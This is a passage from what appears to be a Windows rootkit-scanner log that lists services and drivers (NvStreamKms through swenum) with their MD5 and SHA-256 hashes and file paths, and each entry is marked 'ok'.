09:35:35.0257 0x0ff0  [ 4680DDDDDBA1CB1D56D49B4A6134155C, BF6E538BC10B23F6D93143F5C48155245852798D4846F401E0DA70A5BCFC74E1 ] NvStreamKms     C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys
09:35:35.0263 0x0ff0  NvStreamKms - ok
09:35:35.0713 0x0ff0  [ E14F52B60581EE71849CD45186892046, 72B3E92CD34489306AB7D794C4C1F67513DE80C72A847DCF7A3EEFE2254762D0 ] NvStreamSvc     C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe
09:35:36.0798 0x0ff0  NvStreamSvc - ok
09:35:36.0915 0x0ff0  [ F029A2C032B4A50DEBB21312CFF76189, F47F0FC39AF6DFC8A9A3F0A486357BE76B8BD0753135B567FDB6E213D11893FD ] nvsvc           C:\Windows\system32\nvvsvc.exe
09:35:36.0937 0x0ff0  nvsvc - ok
09:35:37.0005 0x0ff0  [ 35DFC12FD7E44B7CB8CCD7E5A2B3975A, 36E0E39646636F6E027691E5C3903C51479B3F707BDEA40F460FD27E357DA14E ] nvvad_WaveExtensible C:\Windows\system32\drivers\nvvad64v.sys
09:35:37.0023 0x0ff0  nvvad_WaveExtensible - ok
09:35:37.0049 0x0ff0  [ 270D7CD42D6E3979F6DD0146650F0E05, 752489E54C9004EDCBE1F1F208FFD864DA5C83E59A2DDE6B3E0D63ECA996F76F ] nv_agp          C:\Windows\system32\drivers\nv_agp.sys
09:35:37.0059 0x0ff0  nv_agp - ok
09:35:37.0073 0x0ff0  [ 3589478E4B22CE21B41FA1BFC0B8B8A0, AD2469FC753FE552CB809FF405A9AB23E7561292FE89117E3B3B62057EFF0203 ] ohci1394        C:\Windows\system32\drivers\ohci1394.sys
09:35:37.0083 0x0ff0  ohci1394 - ok
09:35:37.0241 0x0ff0  [ D06C2368C93396C6B983CE60523BA99F, ABC90E2DC2DE577AFA37BF34630502AA209C9556DFCC1757844D95D9370FFA8C ] Origin Client Service C:\Program Files (x86)\Origin\OriginClientService.exe
09:35:37.0358 0x0ff0  Origin Client Service - ok
09:35:37.0399 0x0ff0  [ 7A07F911655BA3723EB98F3DDFA56E4B, 83180ECE3DA2EA4BDB3F8F4A482A47DA4DB11046D014288839D7753807D3D57E ] ossrv           C:\Windows\system32\drivers\ctoss2k.sys
09:35:37.0419 0x0ff0  ossrv - ok
09:35:37.0449 0x0ff0  [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] p2pimsvc        C:\Windows\system32\pnrpsvc.dll
09:35:37.0469 0x0ff0  p2pimsvc - ok
09:35:37.0488 0x0ff0  [ 927463ECB02179F88E4B9A17568C63C3, FEFD3447692C277D59EEC7BF218552C8BB6B8C98C26E973675549628408B94CE ] p2psvc          C:\Windows\system32\p2psvc.dll
09:35:37.0506 0x0ff0  p2psvc - ok
09:35:37.0529 0x0ff0  [ 0086431C29C35BE1DBC43F52CC273887, 0D116D49EF9ABB57DA005764F25E692622210627FC2048F06A989B12FA8D0A80 ] Parport         C:\Windows\system32\drivers\parport.sys
09:35:37.0540 0x0ff0  Parport - ok
09:35:37.0551 0x0ff0  [ E9766131EEADE40A27DC27D2D68FBA9C, 63C295EC96DBD25F1A8B908295CCB86B54F2A77A02AAA11E5D9160C2C1A492B6 ] partmgr         C:\Windows\system32\drivers\partmgr.sys
09:35:37.0560 0x0ff0  partmgr - ok
09:35:37.0575 0x0ff0  [ 3AEAA8B561E63452C655DC0584922257, 04C072969B58657602EB0C21CEDF24FCEE14E61B90A0F758F93925EF2C9FC32D ] PcaSvc          C:\Windows\System32\pcasvc.dll
09:35:37.0600 0x0ff0  PcaSvc - ok
09:35:37.0618 0x0ff0  [ 94575C0571D1462A0F70BDE6BD6EE6B3, 7139BAC653EA94A3DD3821CAB35FC5E22F4CCA5ACC2BAABDAA27E4C3C8B27FC9 ] pci             C:\Windows\system32\drivers\pci.sys
09:35:37.0629 0x0ff0  pci - ok
09:35:37.0643 0x0ff0  [ B5B8B5EF2E5CB34DF8DCF8831E3534FA, F2A7CC645B96946CC65BF60E14E70DC09C848D27C7943CE5DEA0C01A6B863480 ] pciide          C:\Windows\system32\drivers\pciide.sys
09:35:37.0651 0x0ff0  pciide - ok
09:35:37.0665 0x0ff0  [ B2E81D4E87CE48589F98CB8C05B01F2F, 6763BEE7270A4873B3E131BFB92313E2750FCBD0AD73C23D1C4F98F7DF73DE14 ] pcmcia          C:\Windows\system32\drivers\pcmcia.sys
09:35:37.0676 0x0ff0  pcmcia - ok
09:35:37.0690 0x0ff0  [ D6B9C2E1A11A3A4B26A182FFEF18F603, BBA5FE08B1DDD6243118E11358FD61B10E850F090F061711C3CB207CE5FBBD36 ] pcw             C:\Windows\system32\drivers\pcw.sys
09:35:37.0699 0x0ff0  pcw - ok
09:35:37.0722 0x0ff0  [ 68769C3356B3BE5D1C732C97B9A80D6E, FB2D61145980A2899D1B7729184C54070315B0E63C9A22400A76CCD39E00029C ] PEAUTH          C:\Windows\system32\drivers\peauth.sys
09:35:37.0761 0x0ff0  PEAUTH - ok
09:35:37.0800 0x0ff0  [ B9B0A4299DD2D76A4243F75FD54DC680, BBF62E9628131FA396EB08D63B76D2D5FBDD61339E92B759125A066470D1C039 ] PeerDistSvc     C:\Windows\system32\peerdistsvc.dll
09:35:37.0880 0x0ff0  PeerDistSvc - ok
09:35:37.0927 0x0ff0  [ E495E408C93141E8FC72DC0C6046DDFA, 489B957DADA0DC128A09468F1AD082DCC657E86053208EA06A12937BE86FB919 ] PerfHost        C:\Windows\SysWow64\perfhost.exe
09:35:37.0937 0x0ff0  PerfHost - ok
09:35:37.0978 0x0ff0  [ 89DA093A491F4478A6753B44C341ECE3, AE15FE7548653A156974FA86243CEC29460DD8C41476EDDBDFFCDA449CE66490 ] Phosgene        C:\Windows\system32\DRIVERS\Phosgene.sys
09:35:37.0994 0x0ff0  Phosgene - ok
09:35:38.0063 0x0ff0  [ C7CF6A6E137463219E1259E3F0F0DD6C, 08D7244F52AA17DD669AA6F77C291DAC88E7B2D1887DE422509C1F83EC85F3DD ] pla             C:\Windows\system32\pla.dll
09:35:38.0129 0x0ff0  pla - ok
09:35:38.0160 0x0ff0  [ 25FBDEF06C4D92815B353F6E792C8129, 57D9764AE6BCE33B242C399CDFC10DD405975BD6411CA8C75FBCD06EEB8442A9 ] PlugPlay        C:\Windows\system32\umpnpmgr.dll
09:35:38.0177 0x0ff0  PlugPlay - ok
09:35:38.0201 0x0ff0  PnkBstrA - ok
09:35:38.0215 0x0ff0  [ 7195581CEC9BB7D12ABE54036ACC2E38, 9C4E5D6EA984148F2663DC529083408B2248DFF6DAAC85D9195F80A722782315 ] PNRPAutoReg     C:\Windows\system32\pnrpauto.dll
09:35:38.0236 0x0ff0  PNRPAutoReg - ok
09:35:38.0248 0x0ff0  [ 3EAC4455472CC2C97107B5291E0DCAFE, E51F373F2DBEAEE516B42BAE8C1B5BB68D00B881323E842CB6EDEC0A183CFFC3 ] PNRPsvc         C:\Windows\system32\pnrpsvc.dll
09:35:38.0262 0x0ff0  PNRPsvc - ok
09:35:38.0286 0x0ff0  [ E4799B87675C59AA1F620DE5C6F113BB, 094EE16D4CEC68DB316002994482344A6BFCFDE399131F7FA11BB46C2DCBF218 ] Point64         C:\Windows\system32\DRIVERS\point64.sys
09:35:38.0294 0x0ff0  Point64 - ok
09:35:38.0321 0x0ff0  [ 4F15D75ADF6156BF56ECED6D4A55C389, 2ADA3EA69A5D7EC2A4D2DD89178DB94EAFDDF95F07B0070D654D9F7A5C12A044 ] PolicyAgent     C:\Windows\System32\ipsecsvc.dll
09:35:38.0353 0x0ff0  PolicyAgent - ok
09:35:38.0394 0x0ff0  [ 6BA9D927DDED70BD1A9CADED45F8B184, 66203CE70A5EDE053929A940F38924C6792239CCCE10DD2C1D90D5B4D6748B55 ] Power           C:\Windows\system32\umpo.dll
09:35:38.0430 0x0ff0  Power - ok
09:35:38.0448 0x0ff0  [ F92A2C41117A11A00BE01CA01A7FCDE9, 38ADC6052696D110CA5F393BC586791920663F5DA66934C2A824DDA9CD89C763 ] PptpMiniport    C:\Windows\system32\DRIVERS\raspptp.sys
09:35:38.0476 0x0ff0  PptpMiniport - ok
09:35:38.0482 0x0ff0  [ 0D922E23C041EFB1C3FAC2A6F943C9BF, 855418A6A58DCAFB181A1A68613B3E203AFB0A9B3D9D26D0C521F9F613B4EAD5 ] Processor       C:\Windows\system32\drivers\processr.sys
09:35:38.0502 0x0ff0  Processor - ok
09:35:38.0522 0x0ff0  [ 53E83F1F6CF9D62F32801CF66D8352A8, 1225FED810BE8E0729EEAE5B340035CCBB9BACD3EF247834400F9B72D05ACE48 ] ProfSvc         C:\Windows\system32\profsvc.dll
09:35:38.0550 0x0ff0  ProfSvc - ok
09:35:38.0573 0x0ff0  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] ProtectedStorage C:\Windows\system32\lsass.exe
09:35:38.0582 0x0ff0  ProtectedStorage - ok
09:35:38.0596 0x0ff0  [ 0557CF5A2556BD58E26384169D72438D, F6F83A616B1F1C6C0DF6D2EC2513E6C23FD4FAA6D36518B8676C619AB74957B4 ] Psched          C:\Windows\system32\DRIVERS\pacer.sys
09:35:38.0630 0x0ff0  Psched - ok
09:35:38.0707 0x0ff0  [ A53A15A11EBFD21077463EE2C7AFEEF0, 6002B012A75045DEA62640A864A8721EADE2F8B65BEB5F5BA76D8CD819774489 ] ql2300          C:\Windows\system32\drivers\ql2300.sys
09:35:38.0752 0x0ff0  ql2300 - ok
09:35:38.0770 0x0ff0  [ 4F6D12B51DE1AAEFF7DC58C4D75423C8, FB6ABAB741CED66A79E31A45111649F2FA3E26CEE77209B5296F789F6F7D08DE ] ql40xx          C:\Windows\system32\drivers\ql40xx.sys
09:35:38.0780 0x0ff0  ql40xx - ok
09:35:38.0799 0x0ff0  [ 906191634E99AEA92C4816150BDA3732, A0305436384104C3B559F9C73902DA19B96B518413379E397C5CDAB0B2B9418F ] QWAVE           C:\Windows\system32\qwave.dll
09:35:38.0816 0x0ff0  QWAVE - ok
09:35:38.0823 0x0ff0  [ 76707BB36430888D9CE9D705398ADB6C, 35C1D1D05F98AC29A33D3781F497A0B40A3CB9CDF25FE1F28F574E40DDF70535 ] QWAVEdrv        C:\Windows\system32\drivers\qwavedrv.sys
09:35:38.0835 0x0ff0  QWAVEdrv - ok
09:35:38.0844 0x0ff0  [ 5A0DA8AD5762FA2D91678A8A01311704, 8A64EB5DBAB7048A9E42A21CEB62CCD5B007A80C199892D7F8C69B48E8A255EF ] RasAcd          C:\Windows\system32\DRIVERS\rasacd.sys
09:35:38.0865 0x0ff0  RasAcd - ok
09:35:38.0915 0x0ff0  [ 7ECFF9B22276B73F43A99A15A6094E90, 62C70DA127F48F796F8897BBFA23AB6EB080CC923F0F091DFA384A93F5C90CA1 ] RasAgileVpn     C:\Windows\system32\DRIVERS\AgileVpn.sys
09:35:38.0937 0x0ff0  RasAgileVpn - ok
09:35:38.0950 0x0ff0  [ 8F26510C5383B8DBE976DE1CD00FC8C7, 60E618C010E8A723960636415573FA17EA0BBEF79647196B3BC0B8DEE680E090 ] RasAuto         C:\Windows\System32\rasauto.dll
09:35:38.0974 0x0ff0  RasAuto - ok
09:35:38.0982 0x0ff0  [ 471815800AE33E6F1C32FB1B97C490CA, 27307265F743DE3A3A3EC1B2C472A3D85FDD0AEC458E0B1177593141EE072698 ] Rasl2tp         C:\Windows\system32\DRIVERS\rasl2tp.sys
09:35:39.0012 0x0ff0  Rasl2tp - ok
09:35:39.0027 0x0ff0  [ EE867A0870FC9E4972BA9EAAD35651E2, 1B848D81705081FD2E18AC762DA7F51455657DAF860BF363DC15925A148BCADA ] RasMan          C:\Windows\System32\rasmans.dll
09:35:39.0064 0x0ff0  RasMan - ok
09:35:39.0084 0x0ff0  [ 855C9B1CD4756C5E9A2AA58A15F58C25, A514F8A9C304D54BDA8DC60F5A64259B057EC83A1CAAF6D2B58CFD55E9561F72 ] RasPppoe        C:\Windows\system32\DRIVERS\raspppoe.sys
09:35:39.0118 0x0ff0  RasPppoe - ok
09:35:39.0134 0x0ff0  [ E8B1E447B008D07FF47D016C2B0EEECB, FEC789F82B912F3E14E49524D40FEAA4373B221156F14045E645D7C37859258C ] RasSstp         C:\Windows\system32\DRIVERS\rassstp.sys
09:35:39.0158 0x0ff0  RasSstp - ok
09:35:39.0208 0x0ff0  [ 77F665941019A1594D887A74F301FA2F, 1FDC6F6853400190C086042933F157814D915C54F26793CAD36CD2607D8810DA ] rdbss           C:\Windows\system32\DRIVERS\rdbss.sys
09:35:39.0234 0x0ff0  rdbss - ok
09:35:39.0244 0x0ff0  [ 302DA2A0539F2CF54D7C6CC30C1F2D8D, 1DF3501BBFFB56C3ECC39DBCC4287D3302216C2208CE22428B8C4967E5DE9D17 ] rdpbus          C:\Windows\system32\DRIVERS\rdpbus.sys
09:35:39.0254 0x0ff0  rdpbus - ok
09:35:39.0267 0x0ff0  [ CEA6CC257FC9B7715F1C2B4849286D24, A78144D18352EA802C39D9D42921CF97A3E0211766B2169B6755C6FC2D77A804 ] RDPCDD          C:\Windows\system32\DRIVERS\RDPCDD.sys
09:35:39.0288 0x0ff0  RDPCDD - ok
09:35:39.0312 0x0ff0  [ 1B6163C503398B23FF8B939C67747683, 339A5AA7970FF34FAAB213B655860C5B0DEC5F983A4A11A088017D849F320ACE ] RDPDR           C:\Windows\system32\drivers\rdpdr.sys
09:35:39.0325 0x0ff0  RDPDR - ok
09:35:39.0336 0x0ff0  [ BB5971A4F00659529A5C44831AF22365, 9AAA5C0D448E821FD85589505D99DF7749715A046BBD211F139E4E652ADDE41F ] RDPENCDD        C:\Windows\system32\drivers\rdpencdd.sys
09:35:39.0367 0x0ff0  RDPENCDD - ok
09:35:39.0370 0x0ff0  [ 216F3FA57533D98E1F74DED70113177A, 60C126A1409D1E9C39F1C9E95F70115BF4AF07780AB499F6E10A612540F173F4 ] RDPREFMP        C:\Windows\system32\drivers\rdprefmp.sys
09:35:39.0390 0x0ff0  RDPREFMP - ok
09:35:39.0459 0x0ff0  [ 70CBA1A0C98600A2AA1863479B35CB90, 91A133297921B4955817176251AFC5283DA3C7D2099700C4C92ECC94DBE9A99E ] RdpVideoMiniport C:\Windows\system32\drivers\rdpvideominiport.sys
09:35:39.0475 0x0ff0  RdpVideoMiniport - ok
09:35:39.0524 0x0ff0  [ FE571E088C2D83619D2D48D4E961BF41, 88C5A2FCB1D0E528657842E39963471A6E42FCA3FCDF37955AEC8258AB4C48EA ] RDPWD           C:\Windows\system32\drivers\RDPWD.sys
09:35:39.0543 0x0ff0  RDPWD - ok
09:35:39.0557 0x0ff0  [ 34ED295FA0121C241BFEF24764FC4520, AAEE5F00CAA763A5BA51CF56BD7262C03409CD72BD5601490E3EC3FFF929BB5F ] rdyboost        C:\Windows\system32\drivers\rdyboost.sys
09:35:39.0569 0x0ff0  rdyboost - ok
09:35:39.0585 0x0ff0  [ 254FB7A22D74E5511C73A3F6D802F192, 3D0FB5840364200DE394F8CC28DA0E334C2B5FA8FF28A41656EE72287F3D3836 ] RemoteAccess    C:\Windows\System32\mprdim.dll
09:35:39.0616 0x0ff0  RemoteAccess - ok
09:35:39.0631 0x0ff0  [ E4D94F24081440B5FC5AA556C7C62702, 147CAA03568DC480F9506E30B84891AB7E433B5EBC05F34FF10F72B00E1C6B22 ] RemoteRegistry  C:\Windows\system32\regsvc.dll
09:35:39.0663 0x0ff0  RemoteRegistry - ok
09:35:39.0701 0x0ff0  [ E4DC58CF7B3EA515AE917FF0D402A7BB, 665B5CD9FE905B0EE3F59A7B1A94760F5393EBEE729877D8584349754C2867E8 ] RpcEptMapper    C:\Windows\System32\RpcEpMap.dll
09:35:39.0731 0x0ff0  RpcEptMapper - ok
09:35:39.0740 0x0ff0  [ D5BA242D4CF8E384DB90E6A8ED850B8C, CB4CB2608B5E31B55FB1A2CF4051E6D08A0C2A5FB231B2116F95938D7577334E ] RpcLocator      C:\Windows\system32\locator.exe
09:35:39.0769 0x0ff0  RpcLocator - ok
09:35:39.0797 0x0ff0  [ 5C627D1B1138676C0A7AB2C2C190D123, C5003F2C912C5CA990E634818D3B4FD72F871900AF2948BD6C4D6400B354B401 ] RpcSs           C:\Windows\system32\rpcss.dll
09:35:39.0826 0x0ff0  RpcSs - ok
09:35:39.0847 0x0ff0  [ DDC86E4F8E7456261E637E3552E804FF, D250C69CCC75F2D88E7E624FCC51300E75637333317D53908CCA7E0F117173DD ] rspndr          C:\Windows\system32\DRIVERS\rspndr.sys
09:35:39.0869 0x0ff0  rspndr - ok
09:35:39.0952 0x0ff0  [ C2A49525F6CEEED97A1D9FC950AAF863, DAA57C1C446861C733D3BE668EB247E40CE3871EF8FA0BB91CEB074B7357E0D8 ] rzudd           C:\Windows\system32\DRIVERS\rzudd.sys
09:35:39.0985 0x0ff0  rzudd - ok
09:35:40.0012 0x0ff0  [ E60C0A09F997826C7627B244195AB581, E8630ED74B38B98BF584E353D992C1311BC36AB7F20A1BB66C9CD65CE1E46F8D ] s3cap           C:\Windows\system32\drivers\vms3cap.sys
09:35:40.0027 0x0ff0  s3cap - ok
09:35:40.0046 0x0ff0  [ 204F3F58212B3E422C90BD9691A2DF28, D748A8CEE4D59B4248C9B1ACA5155D0FF6635A29564B4391B7FAC6261F93FE99 ] SamSs           C:\Windows\system32\lsass.exe
09:35:40.0055 0x0ff0  SamSs - ok
09:35:40.0067 0x0ff0  [ AC03AF3329579FFFB455AA2DAABBE22B, 7AD3B62ADFEC166F9E256F9FF8BAA0568B2ED7308142BF8F5269E6EAA5E0A656 ] sbp2port        C:\Windows\system32\drivers\sbp2port.sys
09:35:40.0077 0x0ff0  sbp2port - ok
09:35:40.0089 0x0ff0  [ 9B7395789E3791A3B6D000FE6F8B131E, E5F067F3F212BF5481668BE1779CBEF053F511F8967589BE2E865ACB9A620024 ] SCardSvr        C:\Windows\System32\SCardSvr.dll
09:35:40.0114 0x0ff0  SCardSvr - ok
09:35:40.0122 0x0ff0  [ 253F38D0D7074C02FF8DEB9836C97D2B, CB5CAFCB8628BB22877F74ACF1DED0BBAED8F4573A74DA7FE94BBBA584889116 ] scfilter        C:\Windows\system32\DRIVERS\scfilter.sys
09:35:40.0151 0x0ff0  scfilter - ok
09:35:40.0195 0x0ff0  [ 262F6592C3299C005FD6BEC90FC4463A, 54095E37F0B6CC677A3E9BDD40F4647C713273D197DB341063AA7F342A60C4A7 ] Schedule        C:\Windows\system32\schedsvc.dll
09:35:40.0244 0x0ff0  Schedule - ok
09:35:40.0260 0x0ff0  [ F17D1D393BBC69C5322FBFAFACA28C7F, 62A1A92B3C52ADFD0B808D7F69DD50238B5F202421F1786F7EAEAA63F274B3E8 ] SCPolicySvc     C:\Windows\System32\certprop.dll
09:35:40.0281 0x0ff0  SCPolicySvc - ok
09:35:40.0359 0x0ff0  [ 6EA4234DC55346E0709560FE7C2C1972, 64011E044C16E2F92689E5F7E4666A075E27BBFA61F3264E5D51CE1656C1D5B8 ] SDRSVC          C:\Windows\System32\SDRSVC.dll
09:35:40.0400 0x0ff0  SDRSVC - ok
09:35:40.0466 0x0ff0  [ 331E7BDE228914574FC9AE6CD520DAFA, 15C6364E73328E86E431DA0960DEE794F96A6E83FF82C9CA181E70127E395311 ] SeaPort         C:\Program Files (x86)\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
09:35:40.0479 0x0ff0  SeaPort - ok
09:35:40.0498 0x0ff0  [ 3EA8A16169C26AFBEB544E0E48421186, 34BBB0459C96B3DE94CCB0D73461562935C583D7BF93828DA4E20A6BC9B7301D ] secdrv          C:\Windows\system32\drivers\secdrv.sys
09:35:40.0525 0x0ff0  secdrv - ok
09:35:40.0539 0x0ff0  [ BC617A4E1B4FA8DF523A061739A0BD87, 10C4057F6B321EB5237FF619747B74F5401BC17D15A8C7060829E8204A2297F9 ] seclogon        C:\Windows\system32\seclogon.dll
09:35:40.0561 0x0ff0  seclogon - ok
09:35:40.0568 0x0ff0  [ C32AB8FA018EF34C0F113BD501436D21, E0EB8E80B51E45CA7EB061E705DA0BC07878759418A8519AE6E12326FE79E7C7 ] SENS            C:\Windows\System32\sens.dll
09:35:40.0596 0x0ff0  SENS - ok
09:35:40.0599 0x0ff0  [ 0336CFFAFAAB87A11541F1CF1594B2B2, 8B8A6A33E78A12FB05E29B2E2775850626574AFD2EF88748D65E690A07B10B8D ] SensrSvc        C:\Windows\system32\sensrsvc.dll
09:35:40.0608 0x0ff0  SensrSvc - ok
09:35:40.0623 0x0ff0  [ CB624C0035412AF0DEBEC78C41F5CA1B, A4D937F11E06CAE914347CA1362F4C98EC5EE0C0C80321E360EA1ABD6726F8D4 ] Serenum         C:\Windows\system32\drivers\serenum.sys
09:35:40.0637 0x0ff0  Serenum - ok
09:35:40.0661 0x0ff0  [ C1D8E28B2C2ADFAEC4BA89E9FDA69BD6, 8F9776FB84C5D11068EAF1FF1D1A46466C655D64D256A8B1E31DC0C23B5DD22D ] Serial          C:\Windows\system32\drivers\serial.sys
09:35:40.0679 0x0ff0  Serial - ok
09:35:40.0690 0x0ff0  [ 1C545A7D0691CC4A027396535691C3E3, 065C30BE598FF4DC55C37E0BBE0CEDF10A370AE2BF5404B42EBBB867A3FFED6D ] sermouse        C:\Windows\system32\drivers\sermouse.sys
09:35:40.0726 0x0ff0  sermouse - ok
09:35:40.0740 0x0ff0  [ 0B6231BF38174A1628C4AC812CC75804, E569BF1F7F5689E2E917FA6516DB53388A5B8B1C6699DEE030147E853218811D ] SessionEnv      C:\Windows\system32\sessenv.dll
09:35:40.0776 0x0ff0  SessionEnv - ok
09:35:40.0780 0x0ff0  [ A554811BCD09279536440C964AE35BBF, DA8F893722F803E189D7D4D6C6232ED34505B63A64ED3A0132A5BB7A2BABDE55 ] sffdisk         C:\Windows\system32\drivers\sffdisk.sys
09:35:40.0791 0x0ff0  sffdisk - ok
09:35:40.0800 0x0ff0  [ FF414F0BAEFEBA59BC6C04B3DB0B87BF, B81EF5D26AEB572CAB590F7AD7CA8C89F296420089EF5E6148E972F2DBCA1042 ] sffp_mmc        C:\Windows\system32\drivers\sffp_mmc.sys
09:35:40.0811 0x0ff0  sffp_mmc - ok
09:35:40.0816 0x0ff0  [ DD85B78243A19B59F0637DCF284DA63C, 6730D4F2BAE7E24615746ACC41B42D01DB6068D6504982008ADA1890DE900197 ] sffp_sd         C:\Windows\system32\drivers\sffp_sd.sys
09:35:40.0833 0x0ff0  sffp_sd - ok
09:35:40.0844 0x0ff0  [ A9D601643A1647211A1EE2EC4E433FF4, 7AC60B4AB48D4BBF1F9681C12EC2A75C72E6E12D30FABC564A24394310E9A5F9 ] sfloppy         C:\Windows\system32\drivers\sfloppy.sys
09:35:40.0853 0x0ff0  sfloppy - ok
09:35:40.0881 0x0ff0  [ B95F6501A2F8B2E78C697FEC401970CE, 758B73A32902299A313348CE7EC189B20EB4CB398D0180E4EE24B84DAD55F291 ] SharedAccess    C:\Windows\System32\ipnathlp.dll
09:35:40.0913 0x0ff0  SharedAccess - ok
09:35:40.0941 0x0ff0  [ AAF932B4011D14052955D4B212A4DA8D, 2A3BFD0FA9569288E91AE3E72CA1EC39E1450D01E6473CE51157E0F138257923 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
09:35:40.0970 0x0ff0  ShellHWDetection - ok
09:35:40.0984 0x0ff0  [ 843CAF1E5FDE1FFD5FF768F23A51E2E1, 89CA9F516E42A6B905474D738CDA2C121020A07DBD4E66CFE569DD77D79D7820 ] SiSRaid2        C:\Windows\system32\drivers\SiSRaid2.sys
09:35:40.0993 0x0ff0  SiSRaid2 - ok
09:35:41.0000 0x0ff0  [ 6A6C106D42E9FFFF8B9FCB4F754F6DA4, 87B85C66DF7EB6FDB8A2341D05FAA5261FF68A90CCFC63F0E4A03824F1E33E5E ] SiSRaid4        C:\Windows\system32\drivers\sisraid4.sys
09:35:41.0010 0x0ff0  SiSRaid4 - ok
09:35:41.0120 0x0ff0  [ E6035ADBA3F13ACF1BEDA7B5D50FDBBB, A840D072395F2394E3B55A080F8F17CC3A02E8BCAFE8B8EC0374ECA1EFF05C23 ] SkypeUpdate     C:\Program Files (x86)\Skype\Updater\Updater.exe
09:35:41.0162 0x0ff0  SkypeUpdate - ok
09:35:41.0180 0x0ff0  [ 548260A7B8654E024DC30BF8A7C5BAA4, 4A7E58331D7765A12F53DC2371739DC9A463940B13E16157CE10DB80E958D740 ] Smb             C:\Windows\system32\DRIVERS\smb.sys
09:35:41.0203 0x0ff0  Smb - ok
09:35:41.0242 0x0ff0  [ 6313F223E817CC09AA41811DAA7F541D, D787061043BEEDB9386B048CB9E680E6A88A1CBAE9BD4A8C0209155BFB76C630 ] SNMPTRAP        C:\Windows\System32\snmptrap.exe
09:35:41.0261 0x0ff0  SNMPTRAP - ok
09:35:41.0274 0x0ff0  [ B9E31E5CACDFE584F34F730A677803F9, 21A5130BD00089C609522A372018A719F8E37103D2DD22C59EACB393BE35A063 ] spldr           C:\Windows\system32\drivers\spldr.sys
09:35:41.0282 0x0ff0  spldr - ok
09:35:41.0310 0x0ff0  [ 85DAA09A98C9286D4EA2BA8D0E644377, F9C324E2EF81193FE831C7EECC44A100CA06F82FA731BF555D9EA4D91DA13329 ] Spooler         C:\Windows\System32\spoolsv.exe
09:35:41.0331 0x0ff0  Spooler - ok
09:35:41.0520 0x0ff0  [ E17E0188BB90FAE42D83E98707EFA59C, FC075F7B39E86CC8EF6DA4E339FE946917E319C347AC70FB0C50AAF36F97E27F ] sppsvc          C:\Windows\system32\sppsvc.exe
09:35:41.0660 0x0ff0  sppsvc - ok
09:35:41.0680 0x0ff0  [ 93D7D61317F3D4BC4F4E9F8A96A7DE45, 36D48B23B8243BE5229707375FCD11C2DCAC96983199345365F065A0CBF33314 ] sppuinotify     C:\Windows\system32\sppuinotify.dll
09:35:41.0703 0x0ff0  sppuinotify - ok
09:35:41.0740 0x0ff0  [ 441FBA48BFF01FDB9D5969EBC1838F0B, 306128F1AD489F87161A089D1BDC1542A4CB742D91A0C12A7CD1863FDB8932C0 ] srv             C:\Windows\system32\DRIVERS\srv.sys
09:35:41.0777 0x0ff0  srv - ok
09:35:41.0791 0x0ff0  [ B4ADEBBF5E3677CCE9651E0F01F7CC28, 726DB2283113AB2A9681E8E9F61132303D6D86E9CD034C40EE4A8C9DB29E87F7 ] srv2            C:\Windows\system32\DRIVERS\srv2.sys
09:35:41.0819 0x0ff0  srv2 - ok
09:35:41.0835 0x0ff0  [ 27E461F0BE5BFF5FC737328F749538C3, AFA4704ED8FFC1A0BAB40DFB81D3AE3F3D933A3C9BF54DDAF39FF9AF3646D9E6 ] srvnet          C:\Windows\system32\DRIVERS\srvnet.sys
09:35:41.0847 0x0ff0  srvnet - ok
09:35:41.0872 0x0ff0  [ 51B52FBD583CDE8AA9BA62B8B4298F33, 2E2403F8AA39E79D1281CA006B51B43139C32A5FDD64BD34DAA4B935338BD740 ] SSDPSRV         C:\Windows\System32\ssdpsrv.dll
09:35:41.0907 0x0ff0  SSDPSRV - ok
09:35:41.0920 0x0ff0  [ AB7AEBF58DAD8DAAB7A6C45E6A8885CB, D21CDBC4C2AA0DB5B4455D5108B0CAF4282A2E664B9035708F212CC094569D9D ] SstpSvc         C:\Windows\system32\sstpsvc.dll
09:35:41.0943 0x0ff0  SstpSvc - ok
09:35:42.0046 0x0ff0  [ 0A3544D7E9AF7D8C991C904339157EDC, 1E1DE4D808AE1174B0CB37E93EBADFC98FEBCD70D612CFE393DDA513581CD123 ] Steam Client Service C:\Program Files (x86)\Common Files\Steam\SteamService.exe
09:35:42.0318 0x0ff0  Steam Client Service - ok
09:35:42.0488 0x0ff0  [ 89123DFAC7E1E6E664D19622D135571B, 6870050EA5B4C0E9091C87FC42767BAD84E726FEC43DB989CE35650ABF9ED09E ] Stereo Service  C:\Program Files (x86)\NVIDIA Corporation\3D Vision\nvSCPAPISvr.exe
09:35:43.0826 0x0ff0  Stereo Service - ok
09:35:43.0847 0x0ff0  [ F3817967ED533D08327DC73BC4D5542A, 1B204454408A690C0A86447F3E4AA9E7C58A9CFB567C94C17C21920BA648B4D5 ] stexstor        C:\Windows\system32\drivers\stexstor.sys
09:35:43.0857 0x0ff0  stexstor - ok
09:35:43.0917 0x0ff0  [ 8DD52E8E6128F4B2DA92CE27402871C1, 1101C38BE8FC383B5F2F9FA402F9652B23B88A764DE2B584DFE62B88B11DEF92 ] stisvc          C:\Windows\System32\wiaservc.dll
09:35:43.0940 0x0ff0  stisvc - ok
09:35:43.0962 0x0ff0  [ 7785DC213270D2FC066538DAF94087E7, F09CB2895241719CA5147B2EE9F7ECBD0303AFFB5CD896F06D4D29BAAAFC207B ] storflt         C:\Windows\system32\drivers\vmstorfl.sys
09:35:43.0970 0x0ff0  storflt - ok
09:35:43.0991 0x0ff0  [ D34E4943D5AC096C8EDEEBFD80D76E23, 1DD7F6F97060B5F763A04ACA1F75E59DAB09EF824FD09B83FC3C192837D006DE ] storvsc         C:\Windows\system32\drivers\storvsc.sys
09:35:43.0999 0x0ff0  storvsc - ok
09:35:44.0008 0x0ff0  [ D01EC09B6711A5F8E7E6564A4D0FBC90, 3CB922291DBADC92B46B9E28CCB6810CD8CCDA3E74518EC9522B58B998E1F969 ] swenum          C:\Windows\system32\DRIVERS\swenum.sys
09:35:44.0016 0x0ff0  swenum - ok
